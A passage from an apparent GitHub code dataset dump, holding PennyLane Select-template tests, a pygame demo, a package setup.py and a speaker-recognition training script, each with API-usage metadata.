control wires \\(1\\) for the desired number of operations \\(3\\). At least 2 control wires required.\",\n ),\n (\n [qml.PauliX(wires=0)] * 10,\n [1, 2, 3],\n r\"Not enough control wires \\(3\\) for the desired number of operations \\(10\\). At least 4 control wires required.\",\n ),\n (\n [qml.PauliX(wires=\"a\"), qml.PauliY(wires=\"b\"), qml.PauliZ(wires=\"c\")],\n [1],\n r\"Not enough control wires \\(1\\) for the desired number of operations \\(3\\). At least 2 control wires required.\",\n ),\n ],\n )\n def test_too_many_ops(self, ops, control, msg_match):\n \"\"\"Test that error is raised if more ops are requested than can fit in control wires\"\"\"\n with pytest.raises(ValueError, match=msg_match):\n qml.Select(ops, control)\n\n\ndef select_rx_circuit(angles):\n \"\"\"Circuit that uses Select for tests.\"\"\"\n qml.Select([qml.RX(angles[0], wires=[1]), qml.RY(angles[1], wires=[1])], control=0)\n return qml.expval(qml.PauliZ(wires=1))\n\n\ndef manual_rx_circuit(angles):\n \"\"\"Circuit that manually creates Select for tests.\"\"\"\n qml.ctrl(qml.RX(angles[0], wires=[1]), control=0, control_values=0)\n qml.ctrl(qml.RY(angles[1], wires=[1]), control=0)\n return qml.expval(qml.PauliZ(wires=1))\n\n\nclass TestInterfaces:\n \"\"\"Tests that the template is compatible with all interfaces, including the computation\n of gradients.\"\"\"\n\n @pytest.mark.autograd\n def test_autograd(self):\n \"\"\"Tests the autograd interface.\"\"\"\n dev = qml.device(\"default.qubit\", wires=2)\n\n circuit_default = qml.QNode(manual_rx_circuit, dev)\n circuit_select = qml.QNode(select_rx_circuit, dev)\n\n input_default = [0.5, 0.2]\n input_grad = pnp.array(input_default, requires_grad=True)\n\n grad_fn = qml.grad(circuit_default)\n grads = grad_fn(input_grad)\n\n grad_fn2 = qml.grad(circuit_select)\n grads2 = grad_fn2(input_grad)\n\n assert qml.math.allclose(grads, grads2)\n\n @pytest.mark.autograd\n def test_autograd_parameter_shift(self):\n \"\"\"Tests the autograd interface using the parameter-shift method.\"\"\"\n dev = qml.device(\"default.qubit\", wires=2)\n\n circuit_default = qml.QNode(manual_rx_circuit, dev, diff_method=\"parameter-shift\")\n circuit_select = qml.QNode(select_rx_circuit, dev, diff_method=\"parameter-shift\")\n\n input_default = [0.5, 0.2]\n input_grad = pnp.array(input_default, requires_grad=True)\n\n grad_fn = qml.grad(circuit_default)\n grads = grad_fn(input_grad)\n\n grad_fn2 = qml.grad(circuit_select)\n grads2 = grad_fn2(input_grad)\n\n assert qml.math.allclose(grads, grads2)\n\n @pytest.mark.tf\n def test_tf(self):\n \"\"\"Tests the tf interface.\"\"\"\n import tensorflow as tf\n\n dev = qml.device(\"default.qubit\", wires=2)\n\n circuit_default = qml.QNode(manual_rx_circuit, dev)\n circuit_tf = qml.QNode(select_rx_circuit, dev)\n\n input_default = [0.5, 0.2]\n input_tf = tf.Variable(input_default)\n\n assert qml.math.allclose(\n qml.matrix(circuit_default)(input_default), qml.matrix(circuit_tf)(input_tf)\n )\n assert qml.math.get_interface(qml.matrix(circuit_tf)(input_tf)) == \"tensorflow\"\n\n with tf.GradientTape() as tape:\n res = circuit_default(input_tf)\n grads = tape.gradient(res, [input_tf])\n\n with tf.GradientTape() as tape2:\n res2 = circuit_tf(input_tf)\n grads2 = tape2.gradient(res2, [input_tf])\n\n assert qml.math.allclose(grads[0], grads2[0])\n\n @pytest.mark.torch\n def test_torch(self):\n \"\"\"Tests the torch interface.\"\"\"\n import torch\n\n dev = qml.device(\"default.qubit\", wires=2)\n\n circuit_default = qml.QNode(manual_rx_circuit, dev)\n 
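# note: both QNodes run on the same device, so the Select-based circuit should\n # reproduce the manual ctrl() construction exactly (same matrix, same gradients)\n 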
circuit_torch = qml.QNode(select_rx_circuit, dev)\n\n input_default = [0.5, 0.2]\n input_torch = torch.tensor(input_default, requires_grad=True)\n\n assert qml.math.allclose(\n qml.matrix(circuit_default)(input_default), qml.matrix(circuit_torch)(input_torch)\n )\n assert qml.math.get_interface(qml.matrix(circuit_torch)(input_torch)) == \"torch\"\n\n res = circuit_default(input_torch)\n res.backward()\n grads = [input_torch.grad]\n\n res2 = circuit_torch(input_torch)\n res2.backward()\n grads2 = [input_torch.grad]\n\n assert qml.math.allclose(grads[0], grads2[0])\n\n @pytest.mark.jax\n @pytest.mark.slow\n def test_jax(self):\n \"\"\"Tests the jax interface.\"\"\"\n import jax\n import jax.numpy as jnp\n\n dev = qml.device(\"default.qubit\", wires=2)\n\n input_default = [0.5, 0.2]\n input_jax = jnp.array(input_default)\n\n circuit_default = qml.QNode(manual_rx_circuit, dev)\n circuit_jax = qml.QNode(select_rx_circuit, dev)\n\n assert qml.math.allclose(\n qml.matrix(circuit_default)(input_default), qml.matrix(circuit_jax)(input_jax)\n )\n assert qml.math.get_interface(qml.matrix(circuit_jax)(input_jax)) == \"jax\"\n\n grad_fn = jax.grad(circuit_default)\n grads = grad_fn(input_jax)\n\n grad_fn2 = jax.grad(circuit_jax)\n grads2 = grad_fn2(input_jax)\n\n assert qml.math.allclose(grads, grads2)\n", "repo_name": "PennyLaneAI/pennylane", "sub_path": "tests/templates/test_subroutines/test_select.py", "file_name": "test_select.py", "file_ext": "py", "file_size_in_byte": 13964, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1965, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pennylane.device", "line_number": 59, "usage_type": "call"}, {"api_name": "pennylane.Hadamard", "line_number": 64, "usage_type": "call"}, {"api_name": "pennylane.Select", "line_number": 66, "usage_type": "call"}, {"api_name": "pennylane.state", "line_number": 67, "usage_type": "call"}, {"api_name": "pennylane.qnode", "line_number": 61, "usage_type": "call"}, {"api_name": "pennylane.Hadamard", "line_number": 72, "usage_type": "call"}, {"api_name": "pennylane.apply", "line_number": 74, "usage_type": "call"}, {"api_name": "pennylane.state", "line_number": 75, "usage_type": "call"}, {"api_name": "pennylane.qnode", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.allclose", "line_number": 77, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 11, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pennylane.PauliX", "line_number": 15, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 15, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 18, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 18, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 19, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 19, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 24, "usage_type": "call"}, {"api_name": "pennylane.Identity", "line_number": 24, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 24, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 27, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 27, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 28, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 28, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 34, "usage_type": 
"call"}, {"api_name": "pennylane.Identity", "line_number": 35, "usage_type": "call"}, {"api_name": "pennylane.Identity", "line_number": 36, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 37, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 41, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 41, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 42, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 42, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 47, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 47, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 50, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 50, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 51, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 51, "usage_type": "call"}, {"api_name": "pennylane.tape.OperationRecorder", "line_number": 117, "usage_type": "call"}, {"api_name": "pennylane.tape", "line_number": 117, "usage_type": "attribute"}, {"api_name": "pennylane.Select", "line_number": 118, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 79, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pennylane.PauliX", "line_number": 83, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 83, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 86, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 86, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 87, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 87, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 91, "usage_type": "call"}, {"api_name": "pennylane.RY", "line_number": 91, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 94, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 94, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 95, "usage_type": "call"}, {"api_name": "pennylane.RY", "line_number": 95, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 100, "usage_type": "call"}, {"api_name": "pennylane.RY", "line_number": 101, "usage_type": "call"}, {"api_name": "pennylane.RZ", "line_number": 102, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 103, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 107, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 107, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 108, "usage_type": "call"}, {"api_name": "pennylane.RY", "line_number": 108, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 109, "usage_type": "call"}, {"api_name": "pennylane.RZ", "line_number": 109, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 110, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 110, "usage_type": "call"}, {"api_name": "pennylane.Select", "line_number": 163, "usage_type": "call"}, {"api_name": "pennylane.equal", "line_number": 167, "usage_type": "call"}, {"api_name": "pennylane.equal", "line_number": 169, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 125, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 125, "usage_type": "attribute"}, {"api_name": "pennylane.PauliX", 
"line_number": 129, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 129, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 132, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 132, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 133, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 133, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 137, "usage_type": "call"}, {"api_name": "pennylane.RY", "line_number": 137, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 140, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 140, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 141, "usage_type": "call"}, {"api_name": "pennylane.RY", "line_number": 141, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 146, "usage_type": "call"}, {"api_name": "pennylane.RY", "line_number": 147, "usage_type": "call"}, {"api_name": "pennylane.RZ", "line_number": 148, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 149, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 153, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 153, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 154, "usage_type": "call"}, {"api_name": "pennylane.RY", "line_number": 154, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 155, "usage_type": "call"}, {"api_name": "pennylane.RZ", "line_number": 155, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 156, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 156, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 175, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 175, "usage_type": "call"}, {"api_name": "pennylane.SWAP", "line_number": 175, "usage_type": "call"}, {"api_name": "pennylane.Select", "line_number": 176, "usage_type": "call"}, {"api_name": "pennylane.equal", "line_number": 182, "usage_type": "call"}, {"api_name": "pennylane.equal", "line_number": 187, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 195, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 195, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 195, "usage_type": "call"}, {"api_name": "pennylane.SWAP", "line_number": 195, "usage_type": "call"}, {"api_name": "pennylane.Select", "line_number": 196, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 197, "usage_type": "call"}, {"api_name": "pennylane.equal", "line_number": 199, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 227, "usage_type": "call"}, {"api_name": "pennylane.Select", "line_number": 228, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 205, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 205, "usage_type": "attribute"}, {"api_name": "pennylane.PauliX", "line_number": 209, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 209, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 209, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 214, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 219, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 219, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 252, "usage_type": "call"}, {"api_name": 
"pennylane.Select", "line_number": 253, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 230, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 230, "usage_type": "attribute"}, {"api_name": "pennylane.PauliX", "line_number": 234, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 234, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 234, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 239, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 244, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 244, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 244, "usage_type": "call"}, {"api_name": "pennylane.Select", "line_number": 258, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 258, "usage_type": "call"}, {"api_name": "pennylane.RY", "line_number": 258, "usage_type": "call"}, {"api_name": "pennylane.expval", "line_number": 259, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 259, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 264, "usage_type": "call"}, {"api_name": "pennylane.RX", "line_number": 264, "usage_type": "call"}, {"api_name": "pennylane.ctrl", "line_number": 265, "usage_type": "call"}, {"api_name": "pennylane.RY", "line_number": 265, "usage_type": "call"}, {"api_name": "pennylane.expval", "line_number": 266, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 266, "usage_type": "call"}, {"api_name": "pennylane.device", "line_number": 276, "usage_type": "call"}, {"api_name": "pennylane.QNode", "line_number": 278, "usage_type": "call"}, {"api_name": "pennylane.QNode", "line_number": 279, "usage_type": "call"}, {"api_name": "pennylane.numpy.array", "line_number": 282, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 282, "usage_type": "name"}, {"api_name": "pennylane.grad", "line_number": 284, "usage_type": "call"}, {"api_name": "pennylane.grad", "line_number": 287, "usage_type": "call"}, {"api_name": "pennylane.math.allclose", "line_number": 290, "usage_type": "call"}, {"api_name": "pennylane.math", "line_number": 290, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 273, "usage_type": "attribute"}, {"api_name": "pennylane.device", "line_number": 295, "usage_type": "call"}, {"api_name": "pennylane.QNode", "line_number": 297, "usage_type": "call"}, {"api_name": "pennylane.QNode", "line_number": 298, "usage_type": "call"}, {"api_name": "pennylane.numpy.array", "line_number": 301, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 301, "usage_type": "name"}, {"api_name": "pennylane.grad", "line_number": 303, "usage_type": "call"}, {"api_name": "pennylane.grad", "line_number": 306, "usage_type": "call"}, {"api_name": "pennylane.math.allclose", "line_number": 309, "usage_type": "call"}, {"api_name": "pennylane.math", "line_number": 309, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 292, "usage_type": "attribute"}, {"api_name": "pennylane.device", "line_number": 316, "usage_type": "call"}, {"api_name": "pennylane.QNode", "line_number": 318, "usage_type": "call"}, {"api_name": "pennylane.QNode", "line_number": 319, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 322, "usage_type": "call"}, {"api_name": "pennylane.math.allclose", "line_number": 324, "usage_type": "call"}, {"api_name": "pennylane.math", "line_number": 324, 
"usage_type": "attribute"}, {"api_name": "pennylane.matrix", "line_number": 325, "usage_type": "call"}, {"api_name": "pennylane.math.get_interface", "line_number": 327, "usage_type": "call"}, {"api_name": "pennylane.math", "line_number": 327, "usage_type": "attribute"}, {"api_name": "pennylane.matrix", "line_number": 327, "usage_type": "call"}, {"api_name": "tensorflow.GradientTape", "line_number": 329, "usage_type": "call"}, {"api_name": "tensorflow.GradientTape", "line_number": 333, "usage_type": "call"}, {"api_name": "pennylane.math.allclose", "line_number": 337, "usage_type": "call"}, {"api_name": "pennylane.math", "line_number": 337, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 311, "usage_type": "attribute"}, {"api_name": "pennylane.device", "line_number": 344, "usage_type": "call"}, {"api_name": "pennylane.QNode", "line_number": 346, "usage_type": "call"}, {"api_name": "pennylane.QNode", "line_number": 347, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 350, "usage_type": "call"}, {"api_name": "pennylane.math.allclose", "line_number": 352, "usage_type": "call"}, {"api_name": "pennylane.math", "line_number": 352, "usage_type": "attribute"}, {"api_name": "pennylane.matrix", "line_number": 353, "usage_type": "call"}, {"api_name": "pennylane.math.get_interface", "line_number": 355, "usage_type": "call"}, {"api_name": "pennylane.math", "line_number": 355, "usage_type": "attribute"}, {"api_name": "pennylane.matrix", "line_number": 355, "usage_type": "call"}, {"api_name": "pennylane.math.allclose", "line_number": 365, "usage_type": "call"}, {"api_name": "pennylane.math", "line_number": 365, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 339, "usage_type": "attribute"}, {"api_name": "pennylane.device", "line_number": 374, "usage_type": "call"}, {"api_name": "jax.numpy.array", "line_number": 377, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 377, "usage_type": "name"}, {"api_name": "pennylane.QNode", "line_number": 379, "usage_type": "call"}, {"api_name": "pennylane.QNode", "line_number": 380, "usage_type": "call"}, {"api_name": "pennylane.math.allclose", "line_number": 382, "usage_type": "call"}, {"api_name": "pennylane.math", "line_number": 382, "usage_type": "attribute"}, {"api_name": "pennylane.matrix", "line_number": 383, "usage_type": "call"}, {"api_name": "pennylane.math.get_interface", "line_number": 385, "usage_type": "call"}, {"api_name": "pennylane.math", "line_number": 385, "usage_type": "attribute"}, {"api_name": "pennylane.matrix", "line_number": 385, "usage_type": "call"}, {"api_name": "jax.grad", "line_number": 387, "usage_type": "call"}, {"api_name": "jax.grad", "line_number": 390, "usage_type": "call"}, {"api_name": "pennylane.math.allclose", "line_number": 393, "usage_type": "call"}, {"api_name": "pennylane.math", "line_number": 393, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 367, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 368, "usage_type": "attribute"}]} +{"seq_id": "37831128421", "text": "import pygame\n\n\n# constants\nBG_COLOR = 'antiquewhite2'\nCOLOR_PALETTE = {\n 0: (244, 105, 251),\n 1: (105, 184, 251)\n}\nSCR_SIZE = (480, 270)\n\n\nclass SharedVars:\n def __init__(self):\n self.game_over = False\n self.av_y_speed = 0\n self.curr_color_code = 0\n\n\ndef event_handling(ev_queue, state):\n for ev in ev_queue:\n if ev.type == pygame.QUIT:\n state.game_over = True\n\n elif ev.type == pygame.KEYDOWN:\n if ev.key == 
pygame.K_ESCAPE:\n state.game_over = True\n elif ev.key == pygame.K_SPACE:\n state.curr_color_code = (state.curr_color_code + 1) % 2\n elif ev.key == pygame.K_UP:\n state.av_y_speed = -1\n elif ev.key == pygame.K_DOWN:\n state.av_y_speed = 1\n\n elif ev.type == pygame.KEYUP:\n prkeys = pygame.key.get_pressed()\n if (not prkeys[pygame.K_UP]) and (not prkeys[pygame.K_DOWN]):\n state.av_y_speed = 0\n\n\ndef play_game():\n av_pos = [240, 135]\n game_st = SharedVars()\n screen = pygame.display.set_mode(SCR_SIZE)\n clock = pygame.time.Clock()\n\n while not game_st.game_over:\n event_handling(pygame.event.get(), game_st)\n\n av_pos[1] = (av_pos[1] + game_st.av_y_speed) % SCR_SIZE[1]\n\n screen.fill(BG_COLOR)\n pl_color = COLOR_PALETTE[game_st.curr_color_code]\n pygame.draw.circle(screen, pl_color, av_pos, 15, 0)\n pygame.display.update()\n clock.tick(60)\n\n\nif __name__ == '__main__':\n print(\"Demo A | controls:\")\n print(\"UP/DOWN arrow, SPACE, ESCAPE\")\n pygame.init()\n pygame.display.set_caption('demo-a uses pygame only')\n play_game()\n pygame.quit()\n print('bye.')\n", "repo_name": "gaudiatech/pyved-engine", "sub_path": "examples_basic/demo-a-pygame.py", "file_name": "demo-a-pygame.py", "file_ext": "py", "file_size_in_byte": 1741, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 53, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.QUIT", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 36, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 45, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 54, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 55, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 62, "usage_type": "call"}, {"api_name": "pygame.display.set_caption", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "74110141606", "text": "from setuptools import setup, find_packages\n\n# To use a consistent encoding\nfrom codecs import open\nfrom os import path\n\n# read the contents of your README file\nfrom pathlib import Path\nthis_directory = 
Path(__file__).parent\nlong_description = (this_directory / \"README.md\").read_text()\n\n\nsetup(\n name='genopyc',\n packages=find_packages(),\n version='2.0.9',\n long_description=long_description,\n include_package_data=True,\n package_data={'genopyc': ['data/*']},\n install_requires=['requests','pandas','numpy','networkx','igraph','biomapy','dash','dash_cytoscape','gprofiler_official'],\n long_description_content_type='text/markdown',\n author='Francesco Gualdi',\n license='GPL'\n)\n", "repo_name": "freh-g/genopyc", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 708, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pathlib.Path", "line_number": 9, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 13, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "15934996477", "text": "\nfrom __future__ import division\n\nimport numpy as np\nfrom mel_coefficients import mfcc\nimport matplotlib.pyplot as plt\nfrom LBG import lbg\nfrom scipy.io.wavfile import read\nimport os\nfrom LPC import lpc\nimport wave\nimport struct\n\n\nimport sounddevice as sd\n\ndef wav_to_floats(wave_file):\n w = wave.open(wave_file)\n astr = w.readframes(w.getnframes())\n # convert binary chunks to short\n a = struct.unpack(\"%ih\" % (w.getnframes()* w.getnchannels()), astr)\n a = [float(val) / pow(2, 15) for val in a]\n return a\n\n\n\n\ndef training(nfiltbank, orderLPC):\n nSpeaker = 2\n nCentroid = 16\n codebooks_mfcc = np.empty((nSpeaker,nfiltbank,nCentroid))\n codebooks_lpc = np.empty((nSpeaker, orderLPC, nCentroid))\n directory = os.getcwd() + '/train';\n fname = str()\n\n for i in range(nSpeaker):\n fname = '/speaker' + str(i+1) + '.wav'\n print('Now speaker ', str(i+1), 'features are being trained' )\n (fs,s) = read(directory + fname)\n # read the wav file specified as first command line arg\n s = wav_to_floats(directory + fname)\n s = s[:48000]\n sd.play(s, fs)\n mel_coeff = mfcc(s, fs, nfiltbank)\n lpc_coeff = lpc(s, fs, orderLPC)\n codebooks_mfcc[i,:,:] = lbg(mel_coeff, nCentroid)\n codebooks_lpc[i,:,:] = lbg(lpc_coeff, nCentroid)\n \n\n codebooks = np.empty((2, nfiltbank, nCentroid))\n mel_coeff = np.empty((2, nfiltbank, 68))\n \n for i in range(2):\n fname = '/speaker' + str(i+1) + '.wav'\n (fs,s) = read(directory + fname)\n s = s[:48000]\n mel_coeff[i,:,:] = mfcc(s, fs, nfiltbank)[:,0:68]\n codebooks[i,:,:] = lbg(mel_coeff[i,:,:], nCentroid)\n \n \n plt.figure(nSpeaker + 1)\n s1 = plt.scatter(mel_coeff[0,6,:], mel_coeff[0,4,:],s = 100, color = 'r', marker = 'o')\n c1 = plt.scatter(codebooks[0,6,:], codebooks[0,4,:], s = 100, color = 'r', marker = '+')\n s2 = plt.scatter(mel_coeff[1,6,:], mel_coeff[1,4,:],s = 100, color = 'b', marker = 'o')\n c2 = plt.scatter(codebooks[1,6,:], codebooks[1,4,:], s = 100, color = 'b', marker = '+')\n plt.grid()\n plt.legend((s1, s2, c1, c2), ('Child','Parent','Child centroids', 'Parent centroids'), scatterpoints = 1, loc = 'upper left')\n plt.show()\n \n \n return (codebooks_mfcc, codebooks_lpc)\n \n \n", "repo_name": "tej6666/coding-challenge", "sub_path": "Child_Voice_Prediciton/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 2320, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "wave.open", "line_number": 18, "usage_type": "call"}, {"api_name": 
"struct.unpack", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 32, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 33, "usage_type": "call"}, {"api_name": "scipy.io.wavfile.read", "line_number": 39, "usage_type": "call"}, {"api_name": "sounddevice.play", "line_number": 43, "usage_type": "call"}, {"api_name": "mel_coefficients.mfcc", "line_number": 44, "usage_type": "call"}, {"api_name": "LPC.lpc", "line_number": 45, "usage_type": "call"}, {"api_name": "LBG.lbg", "line_number": 46, "usage_type": "call"}, {"api_name": "LBG.lbg", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 51, "usage_type": "call"}, {"api_name": "scipy.io.wavfile.read", "line_number": 55, "usage_type": "call"}, {"api_name": "mel_coefficients.mfcc", "line_number": 57, "usage_type": "call"}, {"api_name": "LBG.lbg", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}]} +{"seq_id": "37173805395", "text": "import openpyxl\nimport 